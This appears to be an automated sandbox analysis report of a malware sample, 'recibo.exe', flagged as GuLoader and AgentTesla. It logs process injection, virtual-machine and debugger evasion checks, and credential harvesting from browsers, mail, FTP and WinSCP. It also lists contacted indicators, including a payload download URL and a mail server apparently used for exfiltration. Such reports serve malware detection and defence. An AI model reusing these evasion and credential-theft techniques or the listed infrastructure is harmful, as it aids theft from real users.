            Source: C:\Users\user\Desktop\recibo.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Users\user\Desktop\recibo.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Users\user\Desktop\recibo.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\recibo.exeFile opened: C:\Users\user\AppData\Local\Temp\FLADBARMEDES.tubJump to behavior
            Source: vm3ddevapi64-debug.dll.1.drBinary or memory string: CompanyNameVMware, Inc.j!
            Source: CasPol.exe, 00000004.00000002.28051387241.0000000000FF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
            Source: vm3ddevapi64-debug.dll.1.drBinary or memory string: http://www.vmware.com/0
            Source: recibo.exe, 00000001.00000002.23386279230.0000000004749000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28053311959.0000000002C99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: vm3ddevapi64-debug.dll.1.drBinary or memory string: VMware, Inc.
            Source: recibo.exe, 00000001.00000002.23386279230.0000000004749000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28053311959.0000000002C99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: vm3ddevapi64-debug.dll.1.drBinary or memory string: VMware, Inc.1!0
            Source: recibo.exe, 00000001.00000002.23385987124.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dll
            Source: recibo.exe, 00000001.00000002.23386279230.0000000004749000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28053311959.0000000002C99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: vm3ddevapi64-debug.dll.1.drBinary or memory string: http://www.vmware.com/0/
            Source: CasPol.exe, 00000004.00000002.28051958179.000000000105A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: vm3ddevapi64-debug.dll.1.drBinary or memory string: VMware, Inc.1
            Source: vm3ddevapi64-debug.dll.1.drBinary or memory string: VMware, Inc.0
            Source: vm3ddevapi64-debug.dll.1.drBinary or memory string: ProductNameVMware SVGA 3D`
            Source: recibo.exe, 00000001.00000002.23385987124.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: recibo.exe, 00000001.00000002.23386279230.0000000004749000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28053311959.0000000002C99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: vm3ddevapi64-debug.dll.1.drBinary or memory string: LegalCopyrightCopyright (C) 1998-2021 VMware, Inc.Z
            Source: recibo.exe, 00000001.00000002.23386279230.0000000004749000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28053311959.0000000002C99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: vm3ddevapi64-debug.dll.1.drBinary or memory string: noreply@vmware.com0
            Source: vm3ddevapi64-debug.dll.1.drBinary or memory string: FileDescriptionVMware SVGA 3D Device API Module:
            Source: CasPol.exe, 00000004.00000002.28053311959.0000000002C99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
            Source: recibo.exe, 00000001.00000002.23386279230.0000000004749000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28053311959.0000000002C99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: vm3ddevapi64-debug.dll.1.drBinary or memory string: ?d:\build\ob\bora-18379147\bora-vmsoft\build\release-x64\svga\wddm\src\lib\raster\bits2pixels.cd:\build\ob\bora-18379147\bora-vmsoft\build\release-x64\svga\wddm\src\lib\umlib\log.cC:\vm3dum_log\vm3dum%s_%d-%d.logwtC:\vm3dum_log\vm3dum*.log%.4d-%.2d-%.2dT%.2d:%.2d:%.2d.%.4d| Thread ID: %d |%s%sDXUM%s: Software\VMware, Inc.\VMware SVGADebugSearchPathEXCEPTION_ACCESS_VIOLATIONEXCEPTION_ARRAY_BOUNDS_EXCEEDEDEXCEPTION_BREAKPOINTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_FLT_INEXACT_RESULTEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_FLT_OVERFLOWEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_UNDERFLOWEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_INT_OVERFLOWEXCEPTION_NONCONTINUABLE_EXCEPTIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_SINGLE_STEPunknownBacktrace[%2d] rip=%p %s+%#x %s:%d
            Source: CasPol.exe, 00000004.00000002.28053311959.0000000002C99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
            Source: vm3ddevapi64-debug.dll.1.drBinary or memory string: Software\VMware, Inc.\VMware SVGA
            Source: recibo.exe, 00000001.00000002.23386279230.0000000004749000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28053311959.0000000002C99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: recibo.exe, 00000001.00000002.23386279230.0000000004749000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28053311959.0000000002C99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: CasPol.exe, 00000004.00000002.28053311959.0000000002C99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_71541BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_71541BFF
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB12C7 rdtsc 1_2_02CB12C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CC5269 mov eax, dword ptr fs:[00000030h]1_2_02CC5269
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CBBC2D mov eax, dword ptr fs:[00000030h]1_2_02CBBC2D
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CC3D6A mov eax, dword ptr fs:[00000030h]1_2_02CC3D6A
            Source: C:\Users\user\Desktop\recibo.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\recibo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: D00000Jump to behavior
            Source: C:\Users\user\Desktop\recibo.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\recibo.exe" Jump to behavior
            Source: C:\Users\user\Desktop\recibo.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\recibo.exe" Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB4544 cpuid 1_2_02CB4544
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_0040352D

            Stealing of Sensitive Information

            barindex
            Yara detected AgentTesla
            Source: Yara matchFile source: 00000004.00000002.28075201958.000000001D471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 432, type: MEMORYSTR
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: Yara matchFile source: 00000004.00000002.28075201958.000000001D471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 432, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected AgentTesla
            Source: Yara matchFile source: 00000004.00000002.28075201958.000000001D471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 432, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts211
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		2
            OS Credential Dumping            		3
            File and Directory Discovery            		Remote Services1
            Archive Collected Data            		Exfiltration Over Other Network Medium1
            Ingress Tool Transfer            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
            System Shutdown/Reboot
            Default Accounts1
            Native API            		1
            Windows Service            		1
            Access Token Manipulation            		1
            Obfuscated Files or Information            		1
            Credentials in Registry            		127
            System Information Discovery            		Remote Desktop Protocol2
            Data from Local System            		Exfiltration Over Bluetooth11
            Encrypted Channel            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)1
            Windows Service            		1
            Timestomp            		Security Account Manager331
            Security Software Discovery            		SMB/Windows Admin Shares1
            Email Collection            		Automated Exfiltration1
            Non-Standard Port            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)111
            Process Injection            		1
            DLL Side-Loading            		NTDS1
            Process Discovery            		Distributed Component Object Model1
            Clipboard Data            		Scheduled Transfer2
            Non-Application Layer Protocol            		SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script241
            Virtualization/Sandbox Evasion            		LSA Secrets241
            Virtualization/Sandbox Evasion            		SSHKeyloggingData Transfer Size Limits123
            Application Layer Protocol            		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common1
            Access Token Manipulation            		Cached Domain Credentials1
            Application Window Discovery            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items111
            Process Injection            		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 635097 Sample: recibo.exe Startdate: 27/05/2022 Architecture: WINDOWS Score: 100 28 mail.cortijocuevas.com 2->28 30 cortijocuevas.com 2->30 32 3 other IPs or domains 2->32 40 Found malware configuration 2->40 42 Multi AV Scanner detection for submitted file 2->42 44 Yara detected GuLoader 2->44 46 3 other signatures 2->46 8 recibo.exe 4 37 2->8         started        signatures3 process4 file5 20 C:\Users\user\...\vm3ddevapi64-debug.dll, PE32+ 8->20 dropped 22 C:\Users\user\AppData\Local\...\System.dll, PE32 8->22 dropped 24 C:\Users\user\AppData\Local\...\lgpllibs.dll, PE32+ 8->24 dropped 26 C:\Users\user\AppData\...\HPSUPD-Win32Exe.exe, PE32+ 8->26 dropped 48 Writes to foreign memory regions 8->48 50 Tries to detect Any.run 8->50 12 CasPol.exe 11 8->12         started        16 CasPol.exe 8->16         started        signatures6 process7 dnsIp8 34 cortijocuevas.com 168.119.38.32, 49764, 587 HETZNER-ASDE Germany 12->34 36 googlehosted.l.googleusercontent.com 142.250.185.65, 443, 49763 GOOGLEUS United States 12->36 38 drive.google.com 172.217.16.142, 443, 49762 GOOGLEUS United States 12->38 52 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->52 54 Tries to steal Mail credentials (via file / registry access) 12->54 56 Tries to harvest and steal ftp login credentials 12->56 62 2 other signatures 12->62 18 conhost.exe 12->18         started        58 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 16->58 60 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 16->60 signatures9 process10

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            recibo.exe55%VirustotalBrowse
            recibo.exe26%MetadefenderBrowse
            recibo.exe50%ReversingLabsWin32.Downloader.GuLoader

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\HPSUPD-Win32Exe.exe0%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\HPSUPD-Win32Exe.exe0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\lgpllibs.dll0%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\lgpllibs.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll3%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\vm3ddevapi64-debug.dll0%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\vm3ddevapi64-debug.dll0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            cortijocuevas.com0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            https://sectigo.com/CPS00%VirustotalBrowse
            https://sectigo.com/CPS00%Avira URL Cloudsafe
            http://zerossl.crt.sectigo.com/ZeroSSLRSADomainSecureSiteCA.crt00%Avira URL Cloudsafe
            http://98Z0mcMphF90Ln.net0%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%Avira URL Cloudsafe
            http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%Avira URL Cloudsafe
            http://zerossl.ocsp.sectigo.com00%Avira URL Cloudsafe
            http://BPNlDG.com0%Avira URL Cloudsafe
            https://mozilla.org00%Avira URL Cloudsafe
            http://mail.cortijocuevas.com0%Avira URL Cloudsafe
            http://cortijocuevas.com0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            cortijocuevas.com
            		168.119.38.32
            		truetrueunknown
            drive.google.com
            		172.217.16.142
            		truefalse
              		high
              googlehosted.l.googleusercontent.com
              		142.250.185.65
              		truefalse
                		high
                doc-0g-cc-docs.googleusercontent.com
                		unknown
                		unknownfalse
                  		high
                  mail.cortijocuevas.com
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://doc-0g-cc-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/c6f1jlkill7f0g8rg2nidoteuikk5gii/1653650775000/00619175272154792338/*/1EX-TfU9P_N_SsQAtVtT8-t2zzMXng6WS?e=downloadfalse
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://127.0.0.1:HTTP/1.1CasPol.exe, 00000004.00000002.28075201958.000000001D471000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      https://sectigo.com/CPS0CasPol.exe, 00000004.00000002.28076773888.000000001D59A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28083111699.000000001F5FA000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.vmware.com/0recibo.exe, 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3ddevapi64-debug.dll.1.drfalse
                        		high
                        http://www.symauth.com/rpa00recibo.exe, 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3ddevapi64-debug.dll.1.drfalse
                          		high
                          https://drive.google.com/CasPol.exe, 00000004.00000002.28051387241.0000000000FF8000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://zerossl.crt.sectigo.com/ZeroSSLRSADomainSecureSiteCA.crt0CasPol.exe, 00000004.00000002.28076773888.000000001D59A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28083111699.000000001F5FA000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://98Z0mcMphF90Ln.netCasPol.exe, 00000004.00000002.28076991037.000000001D5C6000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28075201958.000000001D471000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwCasPol.exe, 00000004.00000002.28075201958.000000001D471000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://DynDns.comDynDNSnamejidpasswordPsi/PsiCasPol.exe, 00000004.00000002.28075201958.000000001D471000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://drive.google.com/pCasPol.exe, 00000004.00000002.28051387241.0000000000FF8000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://doc-0g-cc-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/c6f1jlkiCasPol.exe, 00000004.00000002.28051958179.000000000105A000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.23356845957.000000000108B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.23357279169.000000000108B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28052337111.0000000001088000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.23361732323.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.23361300201.000000000108B000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://www.sil.org/iso639-3/iso_639-3.xml.1.drfalse
                                  		high
                                  http://www.vmware.com/0/recibo.exe, 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3ddevapi64-debug.dll.1.drfalse
                                    		high
                                    https://support.google.com/chrome/?p=plugin_flashCasPol.exe, 00000004.00000002.28076011744.000000001D510000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://zerossl.ocsp.sectigo.com0CasPol.exe, 00000004.00000002.28076773888.000000001D59A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28083111699.000000001F5FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://doc-0g-cc-docs.googleusercontent.com/CasPol.exe, 00000004.00000002.28051758174.0000000001039000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.23361300201.000000000108B000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://nsis.sf.net/NSIS_ErrorErrorrecibo.exefalse
                                          		high
                                          http://www.symauth.com/cps0(recibo.exe, 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3ddevapi64-debug.dll.1.drfalse
                                            		high
                                            http://BPNlDG.comCasPol.exe, 00000004.00000002.28075201958.000000001D471000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://mozilla.org0lgpllibs.dll.1.drfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://mail.cortijocuevas.comCasPol.exe, 00000004.00000002.28076773888.000000001D59A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://cortijocuevas.comCasPol.exe, 00000004.00000002.28076773888.000000001D59A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://doc-0g-cc-docs.googleusercontent.com/eCasPol.exe, 00000004.00000003.23361300201.000000000108B000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              168.119.38.32
                                              		cortijocuevas.comGermany
                                              		24940HETZNER-ASDEtrue
                                              172.217.16.142
                                              		drive.google.comUnited States
                                              		15169GOOGLEUSfalse
                                              142.250.185.65
                                              		googlehosted.l.googleusercontent.comUnited States
                                              		15169GOOGLEUSfalse

                                              General Information

                                              Joe Sandbox Version:34.0.0 Boulder Opal
                                              Analysis ID:635097
                                              Start date and time: 27/05/202213:24:052022-05-27 13:24:05 +02:00
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 13m 5s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Sample file name:recibo.exe
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                              Run name:Suspected Instruction Hammering
                                              Number of analysed new started processes analysed:23
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@6/12@3/3
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HDC Information:
                                              • Successful, ratio: 32.5% (good quality ratio 32%)
                                              • Quality average: 86.8%
                                              • Quality standard deviation: 21.4%
                                              HCA Information:
                                              • Successful, ratio: 97%
                                              • Number of executed functions: 163
                                              • Number of non-executed functions: 109
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Adjust boot time
                                              • Enable AMSI

                                              Warnings

                                              • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 20.54.122.82, 20.82.19.171
                                              • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, wd-prod-cp-eu-north-1-fe.northeurope.cloudapp.azure.com, client.wns.windows.com, wdcpalt.microsoft.com, ctldl.windowsupdate.com, wd-prod-cp-eu-west-2-fe.westeurope.cloudapp.azure.com, img-prod-cms-rt-microsoft-com.akamaized.net, wdcp.microsoft.com, arc.msn.com, wd-prod-cp.trafficmanager.net
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                              • Report size getting too big, too many NtSetInformationFile calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
